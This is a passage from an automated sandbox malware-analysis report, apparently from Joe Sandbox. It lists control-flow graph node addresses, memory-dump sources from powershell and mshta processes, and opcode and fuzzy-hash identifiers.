                                                                  control_flow_graph 80 7fe89a98549-7fe89a985f9 81 7fe89a98add-7fe89a98b96 80->81 82 7fe89a985ff-7fe89a98609 80->82 83 7fe89a9860b-7fe89a98618 82->83 84 7fe89a98622-7fe89a98629 82->84 83->84 85 7fe89a9861a-7fe89a98620 83->85 86 7fe89a9862b-7fe89a9863e 84->86 87 7fe89a98640 84->87 85->84 89 7fe89a98642-7fe89a98644 86->89 87->89 92 7fe89a98a58-7fe89a98a62 89->92 93 7fe89a9864a-7fe89a98656 89->93 94 7fe89a98a64-7fe89a98a74 92->94 95 7fe89a98a75-7fe89a98a85 92->95 93->81 96 7fe89a9865c-7fe89a98666 93->96 98 7fe89a98a87-7fe89a98a8b 95->98 99 7fe89a98a92-7fe89a98adc 95->99 100 7fe89a98668-7fe89a98675 96->100 101 7fe89a98682-7fe89a98692 96->101 98->99 100->101 102 7fe89a98677-7fe89a98680 100->102 101->92 106 7fe89a98698-7fe89a986cc 101->106 102->101 106->92 112 7fe89a986d2-7fe89a986de 106->112 112->81 113 7fe89a986e4-7fe89a986ee 112->113 114 7fe89a98707-7fe89a9870c 113->114 115 7fe89a986f0-7fe89a986fd 113->115 114->92 117 7fe89a98712-7fe89a98717 114->117 115->114 116 7fe89a986ff-7fe89a98705 115->116 116->114 117->92 118 7fe89a9871d-7fe89a98722 117->118 118->92 120 7fe89a98728-7fe89a98737 118->120 121 7fe89a98739-7fe89a98743 120->121 122 7fe89a98747 120->122 123 7fe89a98745 121->123 124 7fe89a98763-7fe89a987ee 121->124 125 7fe89a9874c-7fe89a98759 122->125 123->125 132 7fe89a987f0-7fe89a987fb 124->132 133 7fe89a98802-7fe89a98824 124->133 125->124 126 7fe89a9875b-7fe89a98761 125->126 126->124 132->133 134 7fe89a98826-7fe89a98830 133->134 135 7fe89a98834 133->135 136 7fe89a98850-7fe89a988de 134->136 137 7fe89a98832 134->137 138 7fe89a98839-7fe89a98846 135->138 145 7fe89a988e0-7fe89a988eb 136->145 146 7fe89a988f2-7fe89a98910 136->146 137->138 138->136 139 7fe89a98848-7fe89a9884e 138->139 139->136 145->146 147 7fe89a98920 146->147 148 7fe89a98912-7fe89a9891c 146->148 151 7fe89a98925-7fe89a98933 147->151 149 7fe89a9893d-7fe89a989cd 148->149 150 7fe89a9891e 148->150 158 7fe89a989e1-7fe89a98a3a 149->158 159 7fe89a989cf-7fe89a989da 149->159 150->151 151->149 153 7fe89a98935-7fe89a9893b 151->153 153->149 162 7fe89a98a42-7fe89a98a57 158->162 159->158
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.485746515.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7fe89a90000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 143f030ebdbc6568a85812403d8cdf6570899b414a83ab53c47528480cce6b32
                                                                  • Instruction ID: 57c49555f95298acb49bb27c6a580c0cbd59255a14280576e93c5d2f86af7ee3
                                                                  • Opcode Fuzzy Hash: 143f030ebdbc6568a85812403d8cdf6570899b414a83ab53c47528480cce6b32
                                                                  • Instruction Fuzzy Hash: AE22F33090CB894FD79ADB2C84506697FE2FF9A344F2441EED48EC72A3DA24AC56C751

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 163 7fe89a94165-7fe89a941f4 164 7fe89a94457-7fe89a94516 163->164 165 7fe89a941fa-7fe89a94204 163->165 166 7fe89a94206-7fe89a94213 165->166 167 7fe89a9421d-7fe89a94222 165->167 166->167 168 7fe89a94215-7fe89a9421b 166->168 170 7fe89a94228-7fe89a9422b 167->170 171 7fe89a943fb-7fe89a94405 167->171 168->167 172 7fe89a9422d-7fe89a94240 170->172 173 7fe89a94242 170->173 174 7fe89a94407-7fe89a94413 171->174 175 7fe89a94414-7fe89a94424 171->175 180 7fe89a94244-7fe89a94246 172->180 173->180 176 7fe89a94426-7fe89a9442a 175->176 177 7fe89a94431-7fe89a94454 175->177 176->177 177->164 180->171 181 7fe89a9424c-7fe89a94280 180->181 188 7fe89a94297 181->188 189 7fe89a94282-7fe89a94295 181->189 190 7fe89a94299-7fe89a9429b 188->190 189->190 190->171 192 7fe89a942a1-7fe89a942a9 190->192 192->164 193 7fe89a942af-7fe89a942b9 192->193 194 7fe89a942bb-7fe89a942c8 193->194 195 7fe89a942d5-7fe89a942e5 193->195 194->195 196 7fe89a942ca-7fe89a942d3 194->196 195->171 198 7fe89a942eb-7fe89a9431c 195->198 196->195 198->171 202 7fe89a94322-7fe89a9434e 198->202 204 7fe89a94350-7fe89a94372 202->204 205 7fe89a94374 202->205 206 7fe89a94376-7fe89a94378 204->206 205->206 206->171 207 7fe89a9437e-7fe89a94386 206->207 209 7fe89a94388-7fe89a94392 207->209 210 7fe89a94396 207->210 211 7fe89a94394 209->211 212 7fe89a943b2-7fe89a943e1 209->212 214 7fe89a9439b-7fe89a943a8 210->214 211->214 218 7fe89a943e8-7fe89a943fa 212->218 214->212 215 7fe89a943aa-7fe89a943b0 214->215 215->212
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.485746515.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7fe89a90000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8dd52072a6262f41daaa68d58c1aa0a1a54f2d8c2472c8f7d33a44a034dcdf5a
                                                                  • Instruction ID: 58c30ef98045fc34ca658fdc68b497d55e3c2b355339c10ae913b6b212609a06
                                                                  • Opcode Fuzzy Hash: 8dd52072a6262f41daaa68d58c1aa0a1a54f2d8c2472c8f7d33a44a034dcdf5a
                                                                  • Instruction Fuzzy Hash: ADC1343091DB9A0FE74AA76C58506BA7FE1FF4A744F1801EAD48EC71A3C618AC56C361

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 219 7fe89a910d3-7fe89a910dc 220 7fe89a910ed-7fe89a91124 219->220 221 7fe89a910de-7fe89a910ec 219->221 222 7fe89a9112a-7fe89a9119e 220->222 223 7fe89a911c1-7fe89a911cb 220->223 221->220 233 7fe89a911a6-7fe89a911be 222->233 224 7fe89a911d8-7fe89a911e8 223->224 225 7fe89a911cd-7fe89a911d7 223->225 226 7fe89a911ea-7fe89a911ee 224->226 227 7fe89a911f5-7fe89a9121a 224->227 226->227 233->223
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.485746515.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7fe89a90000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 661b58ed5a01ec76d7b641cbe1c961bb6fc8502bf1dc4a6bbb371390c00b1bdc
                                                                  • Instruction ID: 1da22f85ba68b7b250783602528d10d0058ec06bf32d12325cbfbbe153e4707d
                                                                  • Opcode Fuzzy Hash: 661b58ed5a01ec76d7b641cbe1c961bb6fc8502bf1dc4a6bbb371390c00b1bdc
                                                                  • Instruction Fuzzy Hash: 8941B21170DBC90FE34B937C18642657FE1EF4B258B2901EBD48ECB2A3D9099C5AC362
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.485746515.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7fe89a90000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c516425db82c5a5f59bf40a9a0d9295eda48769cd3c2aba19c0cbd785db01cf5
                                                                  • Instruction ID: d1df3d37b5f565b520837471bee231b71d19be8769461c7200fd6b1faf686939
                                                                  • Opcode Fuzzy Hash: c516425db82c5a5f59bf40a9a0d9295eda48769cd3c2aba19c0cbd785db01cf5
                                                                  • Instruction Fuzzy Hash: F7A1222080EBC90FD747A77898242A67FF1EF4B254F1901EBD48DCB1A3D6199D5AC362
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000003.505608784.00000000034D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_3_34d0000_mshta.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4c2d9e5279ae2725f837bca05fa0298d8567b9ad2ce49a13100f4d7e2c1554c5
                                                                  • Instruction ID: 1c6937d276ccbf958f8b6af405b90de6897d1644d5ee8effcf9be213c6f23a39
                                                                  • Opcode Fuzzy Hash: 4c2d9e5279ae2725f837bca05fa0298d8567b9ad2ce49a13100f4d7e2c1554c5
                                                                  • Instruction Fuzzy Hash: 3021E42070CE8C0FDB89E67C94687247BD1EB6A305F4940EB984EDB3A3D824CC828795
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000003.505749738.0000000002D20000.00000010.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_3_2d20000_mshta.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                  • Instruction ID: 96be14a1308f457b18c6a2536f90850338db6f58630639e7f73f965b0e609d95
                                                                  • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                  • Instruction Fuzzy Hash:
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000003.505749738.0000000002D20000.00000010.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_3_2d20000_mshta.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                  • Instruction ID: 96be14a1308f457b18c6a2536f90850338db6f58630639e7f73f965b0e609d95
                                                                  • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                  • Instruction Fuzzy Hash:
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000003.505749738.0000000002D20000.00000010.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_3_2d20000_mshta.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                  • Instruction ID: 96be14a1308f457b18c6a2536f90850338db6f58630639e7f73f965b0e609d95
                                                                  • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                  • Instruction Fuzzy Hash:
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000003.505749738.0000000002D20000.00000010.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_3_2d20000_mshta.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                  • Instruction ID: 96be14a1308f457b18c6a2536f90850338db6f58630639e7f73f965b0e609d95
                                                                  • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                  • Instruction Fuzzy Hash: